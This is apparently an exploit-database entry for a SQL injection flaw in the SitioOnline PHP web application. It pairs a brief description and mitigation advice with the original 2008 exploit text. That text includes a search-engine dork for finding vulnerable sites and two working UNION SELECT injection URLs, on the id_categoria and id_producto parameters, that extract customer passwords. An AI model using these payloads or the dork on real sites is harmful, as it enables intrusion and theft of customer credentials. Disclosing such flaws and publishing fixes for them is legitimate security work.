header-logo
Suggest Exploit
vendor:
SitioOnline
by:
4lG3r14n0-t3r0
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SitioOnline
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SitioOnline SQL Injection Vulnerability

SitioOnline is vulnerable to SQL injection attacks. Attackers can exploit this vulnerability by sending malicious SQL queries to the vulnerable web application. For example, an attacker can send a malicious SQL query to the vulnerable lista_articulos.php?id_categoria= parameter to extract sensitive information from the database. Another example is sending a malicious SQL query to the vulnerable detalle_articulo.php?id_producto= parameter to extract sensitive information from the database.

Mitigation:

Developers should always use parameterized queries to prevent SQL injection attacks. Additionally, developers should also use input validation techniques to prevent malicious input from entering the application.
Source

Exploit-DB raw data:

  **********************- cvs -vrew ***********************

[!]            SitioOnline SQL Injection Vulnerability
[!] Author    : 4lG3r14n0-t3r0
[!] MAIL      : v5@hotmail.de

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.SitioOnline.cl
[+] script   : SitioOnline
[+] Download :
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"lista_articulos.php?id_categoria="
    or Powered by SitioOnline.com


**************************************************************************/
[ Vulnerable File ]

http://server/lista_articulos.php?id_categoria=

http://server/detalle_articulo.php?id_producto=

[ Exploit ]

[1]

http://server/lista_articulos.php?id_categoria=42+union+select+1,customers_password+from+customers--


[2]


http://server/detalle_articulo.php?id_producto=-7+union+select+1,customers_password+from+customers--

[  Greets ]

[+] :cvs crew : ange78 , saf1-casanova,jess-injection,ijection-master,dark-master , alqaiser, u$er-maskine  , ALL HACKERS MUSLIMS

& all members of : tryag.cc , hackteach.org

made in algeria

N'est pas mort ce qui à jamais dort
________________________________
PC, téléphones portables, souris hi-tech. à gagner grâce à Hotmail ! C'est ici !<http://www.hotmailmagicmoment.com>